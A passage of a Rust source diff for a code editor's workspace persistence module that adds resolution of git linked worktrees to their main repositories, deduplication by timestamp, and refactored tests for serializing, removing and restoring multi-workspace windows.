are git linked worktree checkouts +/// to their main repository paths. +/// +/// For each workspace entry: +/// - If any path is a linked worktree checkout, all worktree paths in that +/// entry are resolved to their main repository paths, producing a new +/// `PathList`. +/// - The resolved entry is then deduplicated against existing entries: if a +/// workspace with the same paths already exists, the entry with the most +/// recent timestamp is kept. +pub async fn resolve_worktree_workspaces( + workspaces: impl IntoIterator, + fs: &dyn Fs, +) -> Vec { + // First pass: resolve worktree paths to main repo paths concurrently. 
+ let resolved = futures::future::join_all(workspaces.into_iter().map(|entry| async move { + let paths = entry.2.paths(); + if paths.is_empty() { + return entry; + } + + // Resolve each path concurrently + let resolved_paths = futures::future::join_all( + paths + .iter() + .map(|path| project::git_store::resolve_git_worktree_to_main_repo(fs, path)), + ) + .await; + + // If no paths were resolved, this entry is not a worktree — keep as-is + if resolved_paths.iter().all(|r| r.is_none()) { + return entry; + } + + // Build new path list, substituting resolved paths + let new_paths: Vec = paths + .iter() + .zip(resolved_paths.iter()) + .map(|(original, resolved)| { + resolved + .as_ref() + .cloned() + .unwrap_or_else(|| original.clone()) + }) + .collect(); + + let new_path_refs: Vec<&Path> = new_paths.iter().map(|p| p.as_path()).collect(); + (entry.0, entry.1, PathList::new(&new_path_refs), entry.3) + })) + .await; + + // Second pass: deduplicate by PathList. + // When two entries resolve to the same paths, keep the one with the + // more recent timestamp. 
+ let mut seen: collections::HashMap, usize> = collections::HashMap::default(); + let mut result: Vec = Vec::new(); + + for entry in resolved { + let key: Vec = entry.2.paths().to_vec(); + if let Some(&existing_idx) = seen.get(&key) { + // Keep the entry with the more recent timestamp + if entry.3 > result[existing_idx].3 { + result[existing_idx] = entry; + } + } else { + seen.insert(key, result.len()); + result.push(entry); + } + } + + result +} + pub fn delete_unloaded_items( alive_items: Vec, workspace_id: WorkspaceId, @@ -2384,23 +2493,34 @@ pub fn delete_unloaded_items( #[cfg(test)] mod tests { use super::*; - use crate::persistence::model::{ - SerializedItem, SerializedPane, SerializedPaneGroup, SerializedWorkspace, SessionWorkspace, + use crate::{ + multi_workspace::MultiWorkspace, + persistence::{ + model::{ + SerializedItem, SerializedPane, SerializedPaneGroup, SerializedWorkspace, + SessionWorkspace, + }, + read_multi_workspace_state, + }, }; - use gpui; + use feature_flags::FeatureFlagAppExt; + use gpui::AppContext as _; use pretty_assertions::assert_eq; + use project::{Project, ProjectGroupKey}; use remote::SshConnectionOptions; use serde_json::json; use std::{thread, time::Duration}; + /// Creates a unique directory in a FakeFs, returning the path. + /// Uses a UUID suffix to avoid collisions with other tests sharing the global DB. 
+ async fn unique_test_dir(fs: &fs::FakeFs, prefix: &str) -> PathBuf { + let dir = PathBuf::from(format!("/test-dirs/{}-{}", prefix, uuid::Uuid::new_v4())); + fs.insert_tree(&dir, json!({})).await; + dir + } + #[gpui::test] async fn test_multi_workspace_serializes_on_add_and_remove(cx: &mut gpui::TestAppContext) { - use crate::multi_workspace::MultiWorkspace; - use crate::persistence::read_multi_workspace_state; - use feature_flags::FeatureFlagAppExt; - use gpui::AppContext as _; - use project::Project; - crate::tests::init_test(cx); cx.update(|cx| { @@ -2415,6 +2535,10 @@ mod tests { let (multi_workspace, cx) = cx.add_window_view(|window, cx| MultiWorkspace::test_new(project1.clone(), window, cx)); + multi_workspace.update(cx, |mw, cx| { + mw.open_sidebar(cx); + }); + multi_workspace.update_in(cx, |mw, _, cx| { mw.set_random_database_id(cx); }); @@ -2426,7 +2550,7 @@ mod tests { let workspace2 = multi_workspace.update_in(cx, |mw, window, cx| { let workspace = cx.new(|cx| crate::Workspace::test_new(project2.clone(), window, cx)); workspace.update(cx, |ws, _cx| ws.set_random_database_id()); - mw.activate(workspace.clone(), cx); + mw.activate(workspace.clone(), window, cx); workspace }); @@ -2434,7 +2558,7 @@ mod tests { cx.run_until_parked(); // Read back the persisted state and check that the active workspace ID was written. 
- let state_after_add = read_multi_workspace_state(window_id); + let state_after_add = cx.update(|_, cx| read_multi_workspace_state(window_id, cx)); let active_workspace2_db_id = workspace2.read_with(cx, |ws, _| ws.database_id()); assert_eq!( state_after_add.active_workspace_id, active_workspace2_db_id, @@ -2444,12 +2568,13 @@ mod tests { // --- Remove the second workspace (index 1) --- multi_workspace.update_in(cx, |mw, window, cx| { - mw.remove_workspace(1, window, cx); + let ws = mw.workspaces().nth(1).unwrap().clone(); + mw.remove(&ws, window, cx); }); cx.run_until_parked(); - let state_after_remove = read_multi_workspace_state(window_id); + let state_after_remove = cx.update(|_, cx| read_multi_workspace_state(window_id, cx)); let remaining_db_id = multi_workspace.read_with(cx, |mw, cx| mw.workspace().read(cx).database_id()); assert_eq!( @@ -3866,27 +3991,35 @@ mod tests { } #[gpui::test] - async fn test_read_serialized_multi_workspaces_with_state() { + async fn test_read_serialized_multi_workspaces_with_state(cx: &mut gpui::TestAppContext) { use crate::persistence::model::MultiWorkspaceState; // Write multi-workspace state for two windows via the scoped KVP. let window_10 = WindowId::from(10u64); let window_20 = WindowId::from(20u64); + let kvp = cx.update(|cx| KeyValueStore::global(cx)); + write_multi_workspace_state( + &kvp, window_10, MultiWorkspaceState { active_workspace_id: Some(WorkspaceId(2)), + project_group_keys: vec![], sidebar_open: true, + sidebar_state: None, }, ) .await; write_multi_workspace_state( + &kvp, window_20, MultiWorkspaceState { active_workspace_id: Some(WorkspaceId(3)), + project_group_keys: vec![], sidebar_open: false, + sidebar_state: None, }, ) .await; @@ -3919,37 +4052,32 @@ mod tests { }, ]; - let results = read_serialized_multi_workspaces(session_workspaces); + let results = cx.update(|cx| read_serialized_multi_workspaces(session_workspaces, cx)); - // Should produce 3 groups: window 10, window 20, and the orphan. 
+ // Should produce 3 results: window 10, window 20, and the orphan. assert_eq!(results.len(), 3); - // Window 10 group: 2 workspaces, active_workspace_id = 2, sidebar open. + // Window 10: active_workspace_id = 2 picks workspace 2 (paths /b), sidebar open. let group_10 = &results[0]; - assert_eq!(group_10.workspaces.len(), 2); + assert_eq!(group_10.active_workspace.workspace_id, WorkspaceId(2)); assert_eq!(group_10.state.active_workspace_id, Some(WorkspaceId(2))); assert_eq!(group_10.state.sidebar_open, true); - // Window 20 group: 1 workspace, active_workspace_id = 3, sidebar closed. + // Window 20: active_workspace_id = 3 picks workspace 3 (paths /c), sidebar closed. let group_20 = &results[1]; - assert_eq!(group_20.workspaces.len(), 1); + assert_eq!(group_20.active_workspace.workspace_id, WorkspaceId(3)); assert_eq!(group_20.state.active_workspace_id, Some(WorkspaceId(3))); assert_eq!(group_20.state.sidebar_open, false); - // Orphan group: no window_id, so state is default. + // Orphan: no active_workspace_id, falls back to first workspace (id 4). let group_none = &results[2]; - assert_eq!(group_none.workspaces.len(), 1); + assert_eq!(group_none.active_workspace.workspace_id, WorkspaceId(4)); assert_eq!(group_none.state.active_workspace_id, None); assert_eq!(group_none.state.sidebar_open, false); } #[gpui::test] async fn test_flush_serialization_completes_before_quit(cx: &mut gpui::TestAppContext) { - use crate::multi_workspace::MultiWorkspace; - use feature_flags::FeatureFlagAppExt; - - use project::Project; - crate::tests::init_test(cx); cx.update(|cx| { @@ -3965,14 +4093,16 @@ mod tests { let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()); + let db = cx.update(|_, cx| WorkspaceDb::global(cx)); + // Assign a database_id so serialization will actually persist. 
- let workspace_id = DB.next_id().await.unwrap(); + let workspace_id = db.next_id().await.unwrap(); workspace.update(cx, |ws, _cx| { ws.set_database_id(workspace_id); }); // Mutate some workspace state. - DB.set_centered_layout(workspace_id, true).await.unwrap(); + db.set_centered_layout(workspace_id, true).await.unwrap(); // Call flush_serialization and await the returned task directly // (without run_until_parked — the point is that awaiting the task @@ -3984,7 +4114,7 @@ mod tests { task.await; // Read the workspace back from the DB and verify serialization happened. - let serialized = DB.workspace_for_id(workspace_id); + let serialized = db.workspace_for_id(workspace_id); assert!( serialized.is_some(), "flush_serialization should have persisted the workspace to DB" @@ -3992,15 +4122,7 @@ mod tests { } #[gpui::test] - async fn test_create_workspace_serializes_active_workspace_id_after_db_id_assigned( - cx: &mut gpui::TestAppContext, - ) { - use crate::multi_workspace::MultiWorkspace; - use crate::persistence::read_multi_workspace_state; - use feature_flags::FeatureFlagAppExt; - - use project::Project; - + async fn test_create_workspace_serialization(cx: &mut gpui::TestAppContext) { crate::tests::init_test(cx); cx.update(|cx| { @@ -4024,73 +4146,32 @@ mod tests { // Create a new workspace via the MultiWorkspace API (triggers next_id()). multi_workspace.update_in(cx, |mw, window, cx| { - mw.create_workspace(window, cx); + mw.create_test_workspace(window, cx).detach(); }); // Let the async next_id() and re-serialization tasks complete. cx.run_until_parked(); - // Read back the multi-workspace state. - let state = read_multi_workspace_state(window_id); - - // The new workspace should now have a database_id, and the multi-workspace - // state should record it as the active workspace. + // The new workspace should now have a database_id. 
let new_workspace_db_id = multi_workspace.read_with(cx, |mw, cx| mw.workspace().read(cx).database_id()); assert!( new_workspace_db_id.is_some(), "New workspace should have a database_id after run_until_parked" ); + + // The multi-workspace state should record it as the active workspace. + let state = cx.update(|_, cx| read_multi_workspace_state(window_id, cx)); assert_eq!( state.active_workspace_id, new_workspace_db_id, "Serialized active_workspace_id should match the new workspace's database_id" ); - } - #[gpui::test] - async fn test_create_workspace_individual_serialization(cx: &mut gpui::TestAppContext) { - use crate::multi_workspace::MultiWorkspace; - use feature_flags::FeatureFlagAppExt; - - use project::Project; - - crate::tests::init_test(cx); - - cx.update(|cx| { - cx.set_staff(true); - cx.update_flags(true, vec!["agent-v2".to_string()]); - }); - - let fs = fs::FakeFs::new(cx.executor()); - let project = Project::test(fs.clone(), [], cx).await; - - let (multi_workspace, cx) = - cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); - - multi_workspace.update_in(cx, |mw, _, cx| { - mw.set_random_database_id(cx); - }); - - // Create a new workspace. - multi_workspace.update_in(cx, |mw, window, cx| { - mw.create_workspace(window, cx); - }); - - cx.run_until_parked(); - - // Get the new workspace's database_id. - let new_db_id = - multi_workspace.read_with(cx, |mw, cx| mw.workspace().read(cx).database_id()); - assert!( - new_db_id.is_some(), - "New workspace should have a database_id" - ); - - let workspace_id = new_db_id.unwrap(); - - // The workspace should have been serialized to the DB with real data + // The individual workspace row should exist with real data // (not just the bare DEFAULT VALUES row from next_id). 
- let serialized = DB.workspace_for_id(workspace_id); + let workspace_id = new_workspace_db_id.unwrap(); + let db = cx.update(|_, cx| WorkspaceDb::global(cx)); + let serialized = db.workspace_for_id(workspace_id); assert!( serialized.is_some(), "Newly created workspace should be fully serialized in the DB after database_id assignment" @@ -4098,12 +4179,7 @@ mod tests { } #[gpui::test] - async fn test_remove_workspace_deletes_db_row(cx: &mut gpui::TestAppContext) { - use crate::multi_workspace::MultiWorkspace; - use feature_flags::FeatureFlagAppExt; - use gpui::AppContext as _; - use project::Project; - + async fn test_remove_workspace_clears_session_binding(cx: &mut gpui::TestAppContext) { crate::tests::init_test(cx); cx.update(|cx| { @@ -4112,38 +4188,46 @@ mod tests { }); let fs = fs::FakeFs::new(cx.executor()); + let dir = unique_test_dir(&fs, "remove").await; let project1 = Project::test(fs.clone(), [], cx).await; let project2 = Project::test(fs.clone(), [], cx).await; let (multi_workspace, cx) = cx.add_window_view(|window, cx| MultiWorkspace::test_new(project1.clone(), window, cx)); + multi_workspace.update(cx, |mw, cx| { + mw.open_sidebar(cx); + }); + multi_workspace.update_in(cx, |mw, _, cx| { mw.set_random_database_id(cx); }); + let db = cx.update(|_, cx| WorkspaceDb::global(cx)); + // Get a real DB id for workspace2 so the row actually exists. - let workspace2_db_id = DB.next_id().await.unwrap(); + let workspace2_db_id = db.next_id().await.unwrap(); multi_workspace.update_in(cx, |mw, window, cx| { let workspace = cx.new(|cx| crate::Workspace::test_new(project2.clone(), window, cx)); workspace.update(cx, |ws: &mut crate::Workspace, _cx| { ws.set_database_id(workspace2_db_id) }); - mw.activate(workspace.clone(), cx); + mw.activate(workspace.clone(), window, cx); }); // Save a full workspace row to the DB directly. 
- DB.save_workspace(SerializedWorkspace { + let session_id = format!("remove-test-session-{}", Uuid::new_v4()); + db.save_workspace(SerializedWorkspace { id: workspace2_db_id, - paths: PathList::new(&["/tmp/remove_test"]), + paths: PathList::new(&[&dir]), location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), display: Default::default(), docks: Default::default(), centered_layout: false, - session_id: Some("remove-test-session".to_owned()), + session_id: Some(session_id.clone()), breakpoints: Default::default(), window_id: Some(99), user_toolchains: Default::default(), @@ -4151,31 +4235,42 @@ mod tests { .await; assert!( - DB.workspace_for_id(workspace2_db_id).is_some(), + db.workspace_for_id(workspace2_db_id).is_some(), "Workspace2 should exist in DB before removal" ); // Remove workspace at index 1 (the second workspace). multi_workspace.update_in(cx, |mw, window, cx| { - mw.remove_workspace(1, window, cx); + let ws = mw.workspaces().nth(1).unwrap().clone(); + mw.remove(&ws, window, cx); }); cx.run_until_parked(); - // The row should be deleted, not just have session_id cleared. + // The row should still exist so it continues to appear in recent + // projects, but the session binding should be cleared so it is not + // restored as part of any future session. 
assert!( - DB.workspace_for_id(workspace2_db_id).is_none(), - "Removed workspace's DB row should be deleted entirely" + db.workspace_for_id(workspace2_db_id).is_some(), + "Removed workspace's DB row should be preserved for recent projects" + ); + + let session_workspaces = db + .last_session_workspace_locations("remove-test-session", None, fs.as_ref()) + .await + .unwrap(); + let restored_ids: Vec = session_workspaces + .iter() + .map(|sw| sw.workspace_id) + .collect(); + assert!( + !restored_ids.contains(&workspace2_db_id), + "Removed workspace should not appear in session restoration" ); } #[gpui::test] async fn test_remove_workspace_not_restored_as_zombie(cx: &mut gpui::TestAppContext) { - use crate::multi_workspace::MultiWorkspace; - use feature_flags::FeatureFlagAppExt; - use gpui::AppContext as _; - use project::Project; - crate::tests::init_test(cx); cx.update(|cx| { @@ -4192,13 +4287,19 @@ mod tests { let project1 = Project::test(fs.clone(), [], cx).await; let project2 = Project::test(fs.clone(), [], cx).await; + let db = cx.update(|cx| WorkspaceDb::global(cx)); + // Get real DB ids so the rows actually exist. 
- let ws1_id = DB.next_id().await.unwrap(); - let ws2_id = DB.next_id().await.unwrap(); + let ws1_id = db.next_id().await.unwrap(); + let ws2_id = db.next_id().await.unwrap(); let (multi_workspace, cx) = cx.add_window_view(|window, cx| MultiWorkspace::test_new(project1.clone(), window, cx)); + multi_workspace.update(cx, |mw, cx| { + mw.open_sidebar(cx); + }); + multi_workspace.update_in(cx, |mw, _, cx| { mw.workspace().update(cx, |ws, _cx| { ws.set_database_id(ws1_id); @@ -4210,13 +4311,13 @@ mod tests { workspace.update(cx, |ws: &mut crate::Workspace, _cx| { ws.set_database_id(ws2_id) }); - mw.activate(workspace.clone(), cx); + mw.activate(workspace.clone(), window, cx); }); let session_id = "test-zombie-session"; let window_id_val: u64 = 42; - DB.save_workspace(SerializedWorkspace { + db.save_workspace(SerializedWorkspace { id: ws1_id, paths: PathList::new(&[dir1.path()]), location: SerializedWorkspaceLocation::Local, @@ -4232,7 +4333,7 @@ mod tests { }) .await; - DB.save_workspace(SerializedWorkspace { + db.save_workspace(SerializedWorkspace { id: ws2_id, paths: PathList::new(&[dir2.path()]), location: SerializedWorkspaceLocation::Local, @@ -4250,13 +4351,14 @@ mod tests { // Remove workspace2 (index 1). multi_workspace.update_in(cx, |mw, window, cx| { - mw.remove_workspace(1, window, cx); + let ws = mw.workspaces().nth(1).unwrap().clone(); + mw.remove(&ws, window, cx); }); cx.run_until_parked(); // The removed workspace should NOT appear in session restoration. 
- let locations = DB + let locations = db .last_session_workspace_locations(session_id, None, fs.as_ref()) .await .unwrap(); @@ -4275,11 +4377,6 @@ mod tests { #[gpui::test] async fn test_pending_removal_tasks_drained_on_flush(cx: &mut gpui::TestAppContext) { - use crate::multi_workspace::MultiWorkspace; - use feature_flags::FeatureFlagAppExt; - use gpui::AppContext as _; - use project::Project; - crate::tests::init_test(cx); cx.update(|cx| { @@ -4288,15 +4385,22 @@ mod tests { }); let fs = fs::FakeFs::new(cx.executor()); + let dir = unique_test_dir(&fs, "pending-removal").await; let project1 = Project::test(fs.clone(), [], cx).await; let project2 = Project::test(fs.clone(), [], cx).await; + let db = cx.update(|cx| WorkspaceDb::global(cx)); + // Get a real DB id for workspace2 so the row actually exists. - let workspace2_db_id = DB.next_id().await.unwrap(); + let workspace2_db_id = db.next_id().await.unwrap(); let (multi_workspace, cx) = cx.add_window_view(|window, cx| MultiWorkspace::test_new(project1.clone(), window, cx)); + multi_workspace.update(cx, |mw, cx| { + mw.open_sidebar(cx); + }); + multi_workspace.update_in(cx, |mw, _, cx| { mw.set_random_database_id(cx); }); @@ -4306,20 +4410,21 @@ mod tests { workspace.update(cx, |ws: &mut crate::Workspace, _cx| { ws.set_database_id(workspace2_db_id) }); - mw.activate(workspace.clone(), cx); + mw.activate(workspace.clone(), window, cx); }); // Save a full workspace row to the DB directly and let it settle. 
- DB.save_workspace(SerializedWorkspace { + let session_id = format!("pending-removal-session-{}", Uuid::new_v4()); + db.save_workspace(SerializedWorkspace { id: workspace2_db_id, - paths: PathList::new(&["/tmp/pending_removal_test"]), + paths: PathList::new(&[&dir]), location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), display: Default::default(), docks: Default::default(), centered_layout: false, - session_id: Some("pending-removal-session".to_owned()), + session_id: Some(session_id.clone()), breakpoints: Default::default(), window_id: Some(88), user_toolchains: Default::default(), @@ -4329,7 +4434,8 @@ mod tests { // Remove workspace2 — this pushes a task to pending_removal_tasks. multi_workspace.update_in(cx, |mw, window, cx| { - mw.remove_workspace(1, window, cx); + let ws = mw.workspaces().nth(1).unwrap().clone(); + mw.remove(&ws, window, cx); }); // Simulate the quit handler pattern: collect flush tasks + pending @@ -4337,7 +4443,6 @@ mod tests { let all_tasks = multi_workspace.update_in(cx, |mw, window, cx| { let mut tasks: Vec> = mw .workspaces() - .iter() .map(|workspace| { workspace.update(cx, |workspace, cx| { workspace.flush_serialization(window, cx) @@ -4353,19 +4458,29 @@ mod tests { }); futures::future::join_all(all_tasks).await; - // After awaiting, the DB row should be deleted. + // The row should still exist (for recent projects), but the session + // binding should have been cleared by the pending removal task. 
assert!( - DB.workspace_for_id(workspace2_db_id).is_none(), - "Pending removal task should have deleted the workspace row when awaited" + db.workspace_for_id(workspace2_db_id).is_some(), + "Workspace row should be preserved for recent projects" + ); + + let session_workspaces = db + .last_session_workspace_locations("pending-removal-session", None, fs.as_ref()) + .await + .unwrap(); + let restored_ids: Vec = session_workspaces + .iter() + .map(|sw| sw.workspace_id) + .collect(); + assert!( + !restored_ids.contains(&workspace2_db_id), + "Pending removal task should have cleared the session binding" ); } #[gpui::test] async fn test_create_workspace_bounds_observer_uses_fresh_id(cx: &mut gpui::TestAppContext) { - use crate::multi_workspace::MultiWorkspace; - use feature_flags::FeatureFlagAppExt; - use project::Project; - crate::tests::init_test(cx); cx.update(|cx| { @@ -4383,11 +4498,9 @@ mod tests { mw.set_random_database_id(cx); }); - multi_workspace.update_in(cx, |mw, window, cx| { - mw.create_workspace(window, cx); - }); - - cx.run_until_parked(); + let task = + multi_workspace.update_in(cx, |mw, window, cx| mw.create_test_workspace(window, cx)); + task.await; let new_workspace_db_id = multi_workspace.read_with(cx, |mw, cx| mw.workspace().read(cx).database_id()); @@ -4398,8 +4511,10 @@ mod tests { let workspace_id = new_workspace_db_id.unwrap(); + let db = cx.update(|_, cx| WorkspaceDb::global(cx)); + assert!( - DB.workspace_for_id(workspace_id).is_some(), + db.workspace_for_id(workspace_id).is_some(), "The workspace row should exist in the DB" ); @@ -4410,7 +4525,7 @@ mod tests { cx.executor().advance_clock(Duration::from_millis(200)); cx.run_until_parked(); - let serialized = DB + let serialized = db .workspace_for_id(workspace_id) .expect("workspace row should still exist"); assert!( @@ -4423,10 +4538,6 @@ mod tests { #[gpui::test] async fn test_flush_serialization_writes_bounds(cx: &mut gpui::TestAppContext) { - use crate::multi_workspace::MultiWorkspace; - 
use feature_flags::FeatureFlagAppExt; - use project::Project; - crate::tests::init_test(cx); cx.update(|cx| { @@ -4443,7 +4554,8 @@ mod tests { let (multi_workspace, cx) = cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); - let workspace_id = DB.next_id().await.unwrap(); + let db = cx.update(|_, cx| WorkspaceDb::global(cx)); + let workspace_id = db.next_id().await.unwrap(); multi_workspace.update_in(cx, |mw, _, cx| { mw.workspace().update(cx, |ws, _cx| { ws.set_database_id(workspace_id); @@ -4456,7 +4568,7 @@ mod tests { }); task.await; - let after = DB + let after = db .workspace_for_id(workspace_id) .expect("workspace row should exist after flush_serialization"); assert!( @@ -4469,4 +4581,335 @@ mod tests { before the process exits." ); } + + #[gpui::test] + async fn test_resolve_worktree_workspaces(cx: &mut gpui::TestAppContext) { + let fs = fs::FakeFs::new(cx.executor()); + + // Main repo with a linked worktree entry + fs.insert_tree( + "/repo", + json!({ + ".git": { + "worktrees": { + "feature": { + "commondir": "../../", + "HEAD": "ref: refs/heads/feature" + } + } + }, + "src": { "main.rs": "" } + }), + ) + .await; + + // Linked worktree checkout pointing back to /repo + fs.insert_tree( + "/worktree", + json!({ + ".git": "gitdir: /repo/.git/worktrees/feature", + "src": { "main.rs": "" } + }), + ) + .await; + + // A plain non-git project + fs.insert_tree( + "/plain-project", + json!({ + "src": { "main.rs": "" } + }), + ) + .await; + + // Another normal git repo (used in mixed-path entry) + fs.insert_tree( + "/other-repo", + json!({ + ".git": {}, + "src": { "lib.rs": "" } + }), + ) + .await; + + let t0 = Utc::now() - chrono::Duration::hours(4); + let t1 = Utc::now() - chrono::Duration::hours(3); + let t2 = Utc::now() - chrono::Duration::hours(2); + let t3 = Utc::now() - chrono::Duration::hours(1); + + let workspaces = vec![ + // 1: Main checkout of /repo (opened earlier) + ( + WorkspaceId(1), + 
SerializedWorkspaceLocation::Local, + PathList::new(&["/repo"]), + t0, + ), + // 2: Linked worktree of /repo (opened more recently) + // Should dedup with #1; more recent timestamp wins. + ( + WorkspaceId(2), + SerializedWorkspaceLocation::Local, + PathList::new(&["/worktree"]), + t1, + ), + // 3: Mixed-path workspace: one root is a linked worktree, + // the other is a normal repo. The worktree path should be + // resolved; the normal path kept as-is. + ( + WorkspaceId(3), + SerializedWorkspaceLocation::Local, + PathList::new(&["/other-repo", "/worktree"]), + t2, + ), + // 4: Non-git project — passed through unchanged. + ( + WorkspaceId(4), + SerializedWorkspaceLocation::Local, + PathList::new(&["/plain-project"]), + t3, + ), + ]; + + let result = resolve_worktree_workspaces(workspaces, fs.as_ref()).await; + + // Should have 3 entries: #1 and #2 deduped into one, plus #3 and #4. + assert_eq!(result.len(), 3); + + // First entry: /repo — deduplicated from #1 and #2. + // Keeps the position of #1 (first seen), but with #2's later timestamp. + assert_eq!(result[0].2.paths(), &[PathBuf::from("/repo")]); + assert_eq!(result[0].3, t1); + + // Second entry: mixed-path workspace with worktree resolved. + // /worktree → /repo, so paths become [/other-repo, /repo] (sorted). + assert_eq!( + result[1].2.paths(), + &[PathBuf::from("/other-repo"), PathBuf::from("/repo")] + ); + assert_eq!(result[1].0, WorkspaceId(3)); + + // Third entry: non-git project, unchanged. 
+ assert_eq!(result[2].2.paths(), &[PathBuf::from("/plain-project")]); + assert_eq!(result[2].0, WorkspaceId(4)); + } + + #[gpui::test] + async fn test_restore_window_with_linked_worktree_and_multiple_project_groups( + cx: &mut gpui::TestAppContext, + ) { + crate::tests::init_test(cx); + + cx.update(|cx| { + cx.set_staff(true); + cx.update_flags(true, vec!["agent-v2".to_string()]); + }); + + let fs = fs::FakeFs::new(cx.executor()); + + // Main git repo at /repo + fs.insert_tree( + "/repo", + json!({ + ".git": { + "HEAD": "ref: refs/heads/main", + "worktrees": { + "feature": { + "commondir": "../../", + "HEAD": "ref: refs/heads/feature" + } + } + }, + "src": { "main.rs": "" } + }), + ) + .await; + + // Linked worktree checkout pointing back to /repo + fs.insert_tree( + "/worktree-feature", + json!({ + ".git": "gitdir: /repo/.git/worktrees/feature", + "src": { "lib.rs": "" } + }), + ) + .await; + + // --- Phase 1: Set up the original multi-workspace window --- + + let project_1 = Project::test(fs.clone(), ["/repo".as_ref()], cx).await; + let project_1_linked_worktree = + Project::test(fs.clone(), ["/worktree-feature".as_ref()], cx).await; + + // Wait for git discovery to finish. + cx.run_until_parked(); + + // Create a second, unrelated project so we have two distinct project groups. + fs.insert_tree( + "/other-project", + json!({ + ".git": { "HEAD": "ref: refs/heads/main" }, + "readme.md": "" + }), + ) + .await; + let project_2 = Project::test(fs.clone(), ["/other-project".as_ref()], cx).await; + cx.run_until_parked(); + + // Create the MultiWorkspace with project_2, then add the main repo + // and its linked worktree. The linked worktree is added last and + // becomes the active workspace. 
+ let (multi_workspace, cx) = cx + .add_window_view(|window, cx| MultiWorkspace::test_new(project_2.clone(), window, cx)); + + multi_workspace.update(cx, |mw, cx| { + mw.open_sidebar(cx); + }); + + multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(project_1.clone(), window, cx); + }); + + let workspace_worktree = multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(project_1_linked_worktree.clone(), window, cx) + }); + + // Assign database IDs and set up session bindings so serialization + // writes real rows. + multi_workspace.update_in(cx, |mw, _, cx| { + for workspace in mw.workspaces() { + workspace.update(cx, |ws, _cx| { + ws.set_random_database_id(); + }); + } + }); + + // Flush serialization for each individual workspace (writes to SQLite) + // and for the MultiWorkspace (writes to KVP). + let tasks = multi_workspace.update_in(cx, |mw, window, cx| { + let session_id = mw.workspace().read(cx).session_id(); + let window_id_u64 = window.window_handle().window_id().as_u64(); + + let mut tasks: Vec> = Vec::new(); + for workspace in mw.workspaces() { + tasks.push(workspace.update(cx, |ws, cx| ws.flush_serialization(window, cx))); + if let Some(db_id) = workspace.read(cx).database_id() { + let db = WorkspaceDb::global(cx); + let session_id = session_id.clone(); + tasks.push(cx.background_spawn(async move { + db.set_session_binding(db_id, session_id, Some(window_id_u64)) + .await + .log_err(); + })); + } + } + mw.serialize(cx); + tasks + }); + cx.run_until_parked(); + for task in tasks { + task.await; + } + cx.run_until_parked(); + + let active_db_id = workspace_worktree.read_with(cx, |ws, _| ws.database_id()); + assert!( + active_db_id.is_some(), + "Active workspace should have a database ID" + ); + + // --- Phase 2: Read back and verify the serialized state --- + + let session_id = multi_workspace + .read_with(cx, |mw, cx| mw.workspace().read(cx).session_id()) + .unwrap(); + let db = cx.update(|_, cx| 
WorkspaceDb::global(cx)); + let session_workspaces = db + .last_session_workspace_locations(&session_id, None, fs.as_ref()) + .await + .expect("should load session workspaces"); + assert!( + !session_workspaces.is_empty(), + "Should have at least one session workspace" + ); + + let multi_workspaces = + cx.update(|_, cx| read_serialized_multi_workspaces(session_workspaces, cx)); + assert_eq!( + multi_workspaces.len(), + 1, + "All workspaces share one window, so there should be exactly one multi-workspace" + ); + + let serialized = &multi_workspaces[0]; + assert_eq!( + serialized.active_workspace.workspace_id, + active_db_id.unwrap(), + ); + assert_eq!(serialized.state.project_group_keys.len(), 2,); + + // Verify the serialized project group keys round-trip back to the + // originals. + let restored_keys: Vec = serialized + .state + .project_group_keys + .iter() + .cloned() + .map(Into::into) + .collect(); + let expected_keys = vec![ + ProjectGroupKey::new(None, PathList::new(&["/other-project"])), + ProjectGroupKey::new(None, PathList::new(&["/repo"])), + ]; + assert_eq!( + restored_keys, expected_keys, + "Deserialized project group keys should match the originals" + ); + + // --- Phase 3: Restore the window and verify the result --- + + let app_state = + multi_workspace.read_with(cx, |mw, cx| mw.workspace().read(cx).app_state().clone()); + + let serialized_mw = multi_workspaces.into_iter().next().unwrap(); + let restored_handle: gpui::WindowHandle = cx + .update(|_, cx| { + cx.spawn(async move |mut cx| { + crate::restore_multiworkspace(serialized_mw, app_state, &mut cx).await + }) + }) + .await + .expect("restore_multiworkspace should succeed"); + + cx.run_until_parked(); + + // The restored window should have the same project group keys. 
+ let restored_keys: Vec = restored_handle + .read_with(cx, |mw: &MultiWorkspace, _cx| { + mw.project_group_keys().cloned().collect() + }) + .unwrap(); + assert_eq!( + restored_keys, expected_keys, + "Restored window should have the same project group keys as the original" + ); + + // The active workspace in the restored window should have the linked + // worktree paths. + let active_paths: Vec = restored_handle + .read_with(cx, |mw: &MultiWorkspace, cx| { + mw.workspace() + .read(cx) + .root_paths(cx) + .into_iter() + .map(|p: Arc| p.to_path_buf()) + .collect() + }) + .unwrap(); + assert_eq!( + active_paths, + vec![PathBuf::from("/worktree-feature")], + "The restored active workspace should be the linked worktree project" + ); + } } diff --git a/crates/workspace/src/persistence/model.rs b/crates/workspace/src/persistence/model.rs index cdb646ec3b8248bdd0b5784424ed7b8df8ac0ee8..b50d82fff0b05c3511967dd65a9060e38ca4ca26 100644 --- a/crates/workspace/src/persistence/model.rs +++ b/crates/workspace/src/persistence/model.rs @@ -13,7 +13,7 @@ use db::sqlez::{ use gpui::{AsyncWindowContext, Entity, WeakEntity, WindowId}; use language::{Toolchain, ToolchainScope}; -use project::{Project, debugger::breakpoint_store::SourceBreakpoint}; +use project::{Project, ProjectGroupKey, debugger::breakpoint_store::SourceBreakpoint}; use remote::RemoteConnectionOptions; use serde::{Deserialize, Serialize}; use std::{ @@ -21,7 +21,7 @@ use std::{ path::{Path, PathBuf}, sync::Arc, }; -use util::ResultExt; +use util::{ResultExt, path_list::SerializedPathList}; use uuid::Uuid; #[derive( @@ -36,7 +36,7 @@ pub(crate) enum RemoteConnectionKind { Docker, } -#[derive(Debug, PartialEq, Clone)] +#[derive(Debug, PartialEq, Clone, serde::Serialize, serde::Deserialize)] pub enum SerializedWorkspaceLocation { Local, Remote(RemoteConnectionOptions), @@ -59,19 +59,51 @@ pub struct SessionWorkspace { pub window_id: Option, } +#[derive(Debug, 